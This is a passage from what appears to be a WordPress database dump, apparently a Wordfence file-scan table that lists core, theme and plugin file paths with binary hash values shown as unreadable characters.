�DH�o�5���:z��:мu','',0,'?'),('Т�펹�|����@','wp-includes/images/smilies/icon_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �J<�g��o�9:x','�n�c���x0�ĥ���t��N���Y2X\0!','',0,'?'),('Ю��v�WLѤ��','wp-content/plugins/wordpress-seo/images/readability-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i���Fh0��B��}�','�W��\n�߁��왹����7�`r��{IN�F','',0,'?'),('����/�EmS��~�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-taxonomy-sitemap-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܤ� �c��uNA�','�!o;������A�����fj\\�c��;','',0,'?'),('�����.p]����Z','wp-content/plugins/wordpress-seo/src/integrations/third-party/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H��LM���]j8��','[lj=��B[\n\"���uB�u[Ud�R>�eΫ','',0,'?'),('��5t:}o�Ge�P�(','wp-content/plugins/wordpress-seo/css/dist/inside-editor-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J\Z����6���ǜ','.TLêr���cB�ݑR�x��ܐ�H���1f','',0,'?'),('��u|�=:�1���v�','wp-includes/blocks/post-excerpt/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qj�)O=S�R��','oC�l\'�6IJ�j���2�\'\Z�l\'�\n��}{','',0,'?'),('��/��?����U��','wp-includes/Requests/Utility/FilteredIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#���6B�o��f�u','�AS\Z3H ��Q9ͳo�@h_��!1S/��x','',0,'?'),('��2[�v\\)�I���Q','wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eo1Ǡ܇4RA����','�{b3P4ؚ�R�/��5y�\\d�Q�bzE�x','',0,'?'),('��^�\\�X�PvS�\\�{','wp-admin/js/media-upload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�V?��a�n\r��','�E������a,�\Z��,yM�/\\iQ�Ӡ\"�?28','',0,'?'),('��/<v`6��Y]��\r','wp-content/themes/twentytwentyone/assets/sass/07-utilities/measure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���������{ƸM�','�\r���E=���K��I�y!Y��v*�\\��_�>','',0,'?'),('���`�~P�0N�6H','wp-content/plugins/wordpress-seo/inc/class-wpseo-shortlinker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��/��^�]+�','i�#Ոy��U�q�-�K�\0\0jN�0R�t','',0,'?'),('�����,���f��','wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y2eR���ۻ�I��','Rws�5Ǩ6����Т�Kx�i,�u|��','',0,'?'),('��1�Tv�,m�����','wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician-300x250.jpg',0,'F� d3Wʋy|H_�~','F� d3Wʋy|H_�~','~����d�X�\n��`\0<`N�]vs�@\n �E٫�','',0,'?'),('���e?)S3x֯e�%','wp-content/uploads/2019/10/plumbing4.jpg',0,'�Afq��\Z�Z��n�4Α','�Afq��\Z�Z��n�4Α','tB��$�{9�K�y���:[y�TT�\'�$�#�','',0,'?'),('�8ؘĦ�}b�b�O','wp-content/plugins/wordpress-seo/js/dist/languages/default-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|#p����#tᩑv�','C��K#��P0`�3x�y��1,J߬z���','',0,'?'),('��EU���-ф�M��:','wp-includes/blocks/more/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r�<%g�gdϑ��','[|��.Nˡ����?O��];�#���5�ه�T','',0,'?'),('�&\00%�S��n\Z�e','wp-content/plugins/redirection/matches/http-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}5P$Lg.\"�[�~��','f�أ�,���e���?�̑K���l�9','',0,'?'),('�&Zs\"�i�r�\r�g�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/zh-CN.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�f.�r�a5f�Y�͢','4!5�ȇ7v�a�)Ԣt��1ypʬ㇌}��nF','',0,'?'),('�:�\n��y�ˌ\"4�','wp-includes/blocks/text-columns/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w��`}�N�\n��X','�t!��l�`�|*�^���0� �l$C���;��','',0,'?'),('�?zW>����bwx','wp-content/plugins/redirection/locale/redirection-en_AU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����lT��˘X��','Md\'�����m�a�y�J� v\r�Z֠��Ui6�','',0,'?'),('�UW�~/N�� � �','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#��1���l','��W�H�um�������_n�(7���S�E5Jf','',0,'?'),('�_\\c9mL�v��1��','wp-includes/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Πcg�K���c�|�','�����\Zs����7.8K3�\r�V��0��14','',0,'?'),('�ma�vMv�K�\Z','wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n-ɞ3Z��2���>�','z��\r�i�\'\\\r�jL���㤑�4!�U��','',0,'?'),('�q�=s��-��','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-twitter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_y5o6�����','/+�\'I܆�f�E��\0�.\ne�%��~n��','',0,'?'),('�r+.:��!�5�U��','wp-content/uploads/2019/08/Therapy-300x114.jpg',0,'\Z�|xB��+!*�D','\Z�|xB��+!*�D','`B�]��N��=�JI���ؚo��ʮ��~','',0,'?'),('�uRl�t����\"��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7֊i[L�9ƁH �','߹{8(��Ïat��\0C�n3Q�ڤ\n�l?�$y�','',0,'?'),('���SWb�}q��t%|','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-ingredients.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T_�kr��`��z�7�','[�O�Z�\'��y����3��A{��L\r���q,','',0,'?'),('с���°)���&�T�','wp-content/plugins/wordpress-seo/admin/views/paper-collapsible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f����R��A&',',e�,\r$l��!!f�v��Gx�\0��\0$�.<�','',0,'?'),('щ3w�-��<\r�x&','wp-content/uploads/2016/11/retro-3249927_960_720-updraft-pre-smush-original.jpg',0,'���Pf�!�-&��','���Pf�!�-&��','�y���9�:�~\Z���(�۟���J^���`','',0,'?'),('і��\"��s�k���83','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Ә������)��n','�(%�L{�0�d� &��X�2I���\Z�ʜgq��','',0,'?'),('���r�!��f�PE�','wp-content/themes/vega/color-schemes/orange.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��]��[�T�u���*','^W�^�g)y� t�٠�N�Q��;\"\r/P�','',0,'?'),('��\n�}�u��P�]��','wp-content/plugins/wordpress-seo/css/dist/edit-page-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɘf�����e�\\8','���Rq ��=��o��Mt��I��X,_','',0,'?'),('���_�V#��Bt','wp-content/wflogs/config-transient.php',0,'\\�$d�������','\\�$d�������',' q0�,��\'�6��m*M�pe�@.���PV��Z','',0,'?'),('�)��\rW��蹣�<O�','wp-content/plugins/wordpress-seo/src/generators/breadcrumbs-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nI��ԓ�kW!B��uv','7�7ɩs��A{��� �w��uh��]�,���?','',0,'?'),('�Jh|��0�`Zp�E','wp-admin/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u����G�9�GN�X',';��M/\n���Ք_(��+�`d�D��_tD��','',0,'?'),('�\0�9i6��x�����','wp-content/plugins/wordpress-seo/src/actions/indexing/abstract-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y=7�L6ʲ?�Ϛ ��','�hD�5r��s1��h�ٯp\"f�\"�<��톗�','',0,'?'),('��Y:��R���|�n�J','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/GuardedPropertyTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V*K�S*��^��(}�','�$.����A��^j\n3n���^_L�S','',0,'?'),('�%+D���D��Š ��\r','wp-content/plugins/wordpress-seo/admin/class-admin-asset-yoast-components-l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0є٩\0�S8l��jQ','�.4�\r+_ދy�O��]�`}g}�����+','',0,'?'),('�7�[*w�J\nn���>','wp-includes/js/dist/redux-routine.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɏ|W��/�� ��','N��y9_Ȗ�y����E�A�3���\r�|��','',0,'?'),('�8�s鎗��߹Oh�','wp-includes/js/dist/vendor/regenerator-runtime.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U����Ϩ��Z��#-','�U��gO��jZ��~�ͣ9�a�����%','',0,'?'),('�>�_��Z��B','wp-content/themes/vega/sample/images/full-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=M���F{��J(�E','Dղ(B�ܾ��6�\" 61�0��b�1�=F�','',0,'?'),('�MK�ă^w����8 ','wp-content/plugins/disable-gutenberg/js/settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x!}m��AL�\Z�V\'�','��� Tɛ!�g;{�H�GE�\r�p��O��he','',0,'?'),('�j�i�� �\nT�槿\r','wp-includes/blocks/post-featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�Oc�9�·è�$�','+��%��\0�6�wb�0��Z����Z��Q&','',0,'?'),('�x\nA[�*ZxS��9�NY','wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nC�}wGfoon!�l�X�','~���6WT��-�J\r昫g��ĉ/K�','',0,'?'),('Ҍ!�q�>������Y','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/ContainerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d-����8�0b��','9�o��!F��supA��_��\Zdac�]K�z1�','',0,'?'),('ґD5[�ts/R��#� ','wp-content/plugins/wordpress-seo/inc/health-check-ryte.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/T�I�O�$�*�Wč','��w�T�V��KsO�-�Ov����A��#D��','',0,'?'),('Җ6���M֦��5wH�','wp-content/plugins/wordfence/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k����ߟ*k+;8','7���M$<�rO9�Gj���Ey��Q*+�3','',0,'?'),('Ҟ���ǟ� Ks���','wp-includes/images/icon-pointer-flag-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�b��&�Z�r','4���Bȥ��\'x+c�h�ҠVn�5�I�>�j��','',0,'?'),('ң�ch��ױl>v�','wp-content/plugins/wordpress-seo/css/dist/admin-global-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��t��ce��g�3','��hˉL�J�]s)��nlː�Q�,�G ��q��','',0,'?'),('Ҫ*���H���\n;t��','wp-admin/includes/ajax-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�.�*�0)\\`�','�w��v���N\'���C�[H�`&L�ڹ���','',0,'?'),('ҭ�_VlK�g�!p�1','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oҡu�/B�&?�h��','�Dٽ.�j7It�l�KD�pC���O���Уh�\n','',0,'?'),('ҲE5|�ѵ�C�d闼','wp-admin/options-reading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�0:�DR&�qͱ','m������H��z���Á�9���B�l\0~�m�','',0,'?'),('������ƶ��8AX@','wp-content/plugins/wp-cerber/admin/cerber-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ő\0�U��*���MW�','F��%_�����a�%���]\0�Ƌ*��\\�JI$a ','',0,'?'),('��Lt593�u^���)��','wp-admin/images/comment-grey-bubble-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TY�ŝ2�s,\r�m��','D��x���T-����w��N� ��P�{��','',0,'?'),('��l��I\r,�B8�','wp-includes/blocks/quote/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!u�\0��۔s��','J�A\rh�W�\r>�=�hk2�1L�ܬMs�?m','',0,'?'),('�w�]cI�w��Ȱ�H','wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���蛻�0�ե�J9�','�V�j݈��o��ȟ{\'7�Úع�����','',0,'?'),('�8���Y(��?��','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^|ka\\�-���','��~����v�<&5��(�\raj�e�߷�P\r8�gl','',0,'?'),('�E#l��L��_&ܪ���','wp-admin/images/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�$�>����>�Y','�YW��(��N3�2U;�����<.iDd!��','',0,'?'),('�H �%9���l�ԅ�E','wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z��|JS���','����i\\�JkF��t\\�\0x��Re�he�&j�','',0,'?'),('�M�p�\0���`k�nP','wp-includes/template-canvas.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��l���mN��Q','��%�\nU��d�L���JK��=����C��','',0,'?'),('�U��n�/|r@ڪ��','wp-content/wflogs/config.php',0,'8�dp=�c��+�9','8�dp=�c��+�9','Xp�)��#�L����-�)\"�?�<��a �s','',0,'?'),('�[�:�S���h ˸�','wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<1����!\0�o��','#@^�=}l5�@���W���sa� #a� ��V','',0,'?'),('�js��w2��p��qS','wp-content/plugins/wordfence/lib/wfIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9=hw\Z�{\"`Pl��','NU�2��|��2A���T�$��\r#%�:�','',0,'?'),('�s}�Ƕ�)�T�V��','wp-includes/blocks/nextpage/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �\rͳ�yzbg\'��G','7��q����\\���r�ܛ)[%#�JS�!�J','',0,'?'),('�s�G������S4�','wp-content/plugins/wp-cerber/assets/flags/ca.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�1���I��;pl�s�','��Bx���zU�O.�.t��XB�@ͤ��%��','',0,'?'),('�{ڭd3T�Xy����7;','wp-includes/css/admin-bar-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r-�;�0h)\n���E�','��$���E\Z]x�Y�7�}�a�83o#MP�P','',0,'?'),('�}��e��C��!�*','wp-includes/js/codemirror/codemirror.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �f��h�;f�q�','�u�*�Q�6�Ƅ�d�vdȇ�_���\0�����','',0,'?'),('Ӂ�l-��y4Ngp0','wp-content/themes/twentytwentyone/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�F\ZLO�k:�','Z�8��!!�P���8~�\0����e��h','',0,'?'),('Ӎ�-w�y9�,���','wp-content/plugins/wordpress-seo/admin/class-premium-upsell-admin-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�x�+�����F3��','�����?���@gsR�eNUI`G�@��`t','',0,'?'),('ӕ����\n��t�0','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mpG���aB��NX>��(','%�-*Ψ6F��i�\rWϹ�M�WI���:�v�D','',0,'?'),('ӝҨ���|�\r�9�m','wp-content/uploads/2019/08/roof.jpg',0,'~0i�4�LV��N��','~0i�4�LV��N��','�>[Q�X���<l��=p��\Z7�\r���T�^�','',0,'?'),('ӟ���my�+\nf�:','wp-includes/js/wp-api.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�ϩx.�@���� ','�eU\"O�8�W���|����v�����\'����~)','',0,'?'),('Ӣ������\\\'�A)Ӫ','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q!��\0𭀠\'��','�W�4$a���\'x���-��Kμ�#�Z��','',0,'?'),('Ӥ����ǕL�F��ZQ','wp-includes/css/dist/block-library/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�p�Q,�� 8��*\Z�','s{����3\r3U� �nG��n]�����>�','',0,'?'),('Ө]Z����l9�N\0','wp-content/plugins/redirection/database/schema/latest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�4�M����ä','�������.�c�8��Y��tTw`hGG\'�dh�','',0,'?'),('ӫlQ�h���f]$�G','wp-content/languages/en_GB-9b256ea9cd54df92095e04c76758ceb0.json',0,'�ot8��aLT�l��N�','�ot8��aLT�l��N�','S�d5�U�\Z=�F���ǩ��P���$̴`2','',0,'?'),('Ӱ�@p���� 5x�P','wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��;��MS�\nQd�ڇ','&жd�I�I��2�8!�.!�е�̼���u�','',0,'?'),('Ӳ�\' �Y��','wp-content/themes/vega/assets/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ʔ�q�3��[�','���qa#T0��T�n=���8X\n�Bg%L�','',0,'?'),('�э�o(�H�ttx�.','wp-includes/blocks/table/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۰&R1W6zz�X��','/���������jʆ�jA��<9?ނ)�w2h�','',0,'?'),('�Ҡ�5�������i*Ǡ','wp-content/plugins/wp-cerber/assets/flags/ms.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֠��G/�������Ҳ','�cZ��/�n�[�`��=\Z4�~��+�)%�k�','',0,'?'),('��\Z��~�e,&er�','wp-content/plugins/wordpress-seo/css/dist/monorepo-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�N�]���@���$-x','!\n��\Z������B���9��\"W6#�i�]�','',0,'?'),('��>Zb�o&����','wp-content/plugins/akismet/views/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ܥ&F�e@`','ۑ�&\Z錷�ې7�~�����rb�','',0,'?'),('��5���ĺ�%��','wp-includes/blocks/buttons/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����3�u�XWd�a','��o�-�~.q���Ǣ���L��;1�*�','',0,'?'),('��.\"�)�U\rǸ=}]','wp-content/plugins/wordpress-seo/src/integrations/breadcrumbs-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�O=N9��LSW��','{G|\Z�(1/�,JbPǛ[�Rthe����xL�D','',0,'?'),('����G��I\Z�أ8�','wp-content/plugins/wordpress-seo/src/integrations/admin/workouts-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9:�\\͚h\\MK','۴vO{����Q���K�h���%�șv����','',0,'?'),('��H��AG�|����\"�','wp-includes/blocks/nextpage/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','쮥�@֦�`fx�W�','��\'���\Z[�� <A�����At��؏M�','',0,'?'),('��I7߇S�2�&���','wp-admin/erase-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^g�v~�9Qu�i�\r�','+���ƱO�N6���,�F���]�ڷ�O��/','',0,'?'),('�?H4�V�����\n��','wp-includes/blocks/pullquote/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�PRPp��iy+T���','7`��Q�yg�7s�%\'_��dLڿ���P��','',0,'?'),('� kJ�?� �@x����','wp-includes/blocks/categories/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�,��6�3�O.��','͚i?�e�zΏ%��=�T��n��N\\Ƅ���','',0,'?'),('�����0*�W��','wp-content/plugins/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~ ��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�O�p��/�u���','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/term-link-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','۲S������s�','��Iƴ�f֧ ������mop�S�Tvr�n�','',0,'?'),('�//.\0����llO�(','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/Promise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$��r�����\\.�','9%Q����bN7֭vw�3��P��y%\Z','',0,'?'),('�1؝,zg�z�i*Y�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-tr_TR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���į��@;=$)y,Px','�ބf\r�Q��6\"�[;_��˅�\n��l�','',0,'?'),('�J�|�o���ź�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-de_DE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C� [6sn�RL;','���<�^Rl`��MP��KHn��ӟ�&�9a�D��','',0,'?'),('�].�oo�ȦM-n �','wp-admin/images/align-none-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XC�)[���-�4�','�ߧ&QQ�p\"~�\Z8S����Y����S`','',0,'?'),('�l�.�}+�S�c�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-footer-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Tf������','��`�<���DadXjM� <��\r[j�ߕA�m','',0,'?'),('ԖG�E���>����\0@�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-it_IT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�1��Y��݆��fk�','������@4�eʬ5��&I�}�j(�]5�3³','',0,'?'),('ԛ�a�����tr��','wp-includes/blocks/video/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɖ!�}��Mv���^�',' ���Z\Z��|=G�&;���\\�I�����9-)l�','',0,'?'),('Ԝd�&;0�;�}h��','wp-includes/blocks/columns/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��t��yT}#!>f�','\r�>�J�I�F2��A0�ӡIƶ��<�','',0,'?'),('Ԝ|�w�����6�/��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/th.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �\"h�Ml�s�%-','�^�>ҎT���=!QH�#�;p�]�y������','',0,'?'),('Իq�E�{���n���','wp-includes/blocks/verse/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y����Vq�Y�\n�','MbO<W\'8!����A��S�\r�G_n0���s�','',0,'?'),('Ծ�V;�����P$��','wp-content/uploads/2016/11/retro-3249927_960_720-350x220.jpg',0,'s��6�|l�m����','s��6�|l�m����','��[P(Ϊɷ����Rپ%Y7�[$�U*�3S�','',0,'?'),('Կ���6�s�I�_���Z','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-term-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����j��NB','��`H]��իs�PMPH�c�O��PG9�5','',0,'?'),('�Ȇp���]4��L��q�','wp-includes/css/admin-bar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Q!��&)�`���t','��B�C��һfT=��R���O���\"7��J�','',0,'?'),('��p��S��`�]T]D�','wp-includes/css/dashicons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',J��/��n�R�~�','qԡ���c��q�l5/�3$˝T�GW�','',0,'?'),('�̆lҘ�\\�4�,C-�m','wp-includes/css/dist/block-library/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"�\0�Z�_��','�*f�9c,f��\n?��\na����n�\r��~��','',0,'?'),('��̟��:H�Cbg*I;','wp-content/plugins/wordpress-seo/src/helpers/language-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��FN�4A(,g���','�\\����,ϦQ��W��q\Z�Ժ�w���','',0,'?'),('���/�q��RR�|���','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R���!z@;�Ve����','�#��l�#�к;� KAH9Q�@� ����B~�','',0,'?'),('�\rb�d/ӡ;�\Z�#x','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/EachPromise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']=m�x3�n*g�+���','/���ڑ=��ҹM\0��`�SP�ɿ���M9','',0,'?'),('�X��$�a��B��^','wp-admin/js/user-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6|3����s�J:+IV�','nj�0B�Ƞ|�qO� F����>��g������#','',0,'?'),('�\Z3 b�ws0{/!Bm�','wp-content/plugins/wp-cerber/assets/flags/lu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#x�I���@K���','��f\0�4����;)��x�6ҽՖx�&X��w�v','',0,'?'),('�%f��G���Pѣ��','wp-content/themes/twentytwenty/singular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9�&)e�k�i','�^��~��1o�U���K�����?[�*����','',0,'?'),('�A����$¯��VG','wp-content/uploads/2016/11/home-150x150.jpg',0,'�Ђ�4�kJ��\Z�9','�Ђ�4�kJ��\Z�9','���kF��c�����0�}Kp]U�b)r%�','',0,'?'),('�BImS��96�7���X','wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�G�M�!ex9��','�!ZgbZ��FZ���z����|�YE� ���','',0,'?'),('�G�h˲�;��\'ݷ�/','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j|�ZY����P','���:.P��BIP��i�l�� 9h��� �j� ','',0,'?'),('�gֿ��m�㋣��I','wp-includes/js/dist/data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6�V�.L�e]�g','��!�������κ�A�\r&$qp�N\n� �H�','',0,'?'),('�k\"��O���$N)�$�','wp-content/plugins/wordpress-seo/src/helpers/primary-term-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(\r^�hA!Dj�9��','Lm{�\r?pg rb�%�i�B���a�|S��S�Ä�G','',0,'?'),('�p8��UY?(?9ـB','wp-content/plugins/wp-cerber/languages/wp-cerber-pt_PT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ٌ�M!�\Z���','�N=x�p9Ԧp��H��сbᚕ�US�1\n�[�','',0,'?'),('�p�sZZ�#�N7��e�','wp-includes/css/dist/block-editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yT�k�~AU','/wΒ<��H��q-*\\���ܬXVMZ����','',0,'?'),('�uG#�)�|�^���6','wp-includes/Requests/Exception/HTTP/511.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݧ3�*�=�A>�9���','��I��}7+ƕ�A���l欿B��t�\'s��t','',0,'?'),('ՙ�5qV��#Y�','wp-content/plugins/wp-cerber/assets/flags/ro.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�N����C�Eѩ-�','�J7d[�^k`�\0v�?ł�;%`a[)','',0,'?'),('ջO�sU���ȶTПa','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Sgͻ\rn��?�_','�6;�TIgI�M�\\.�cN 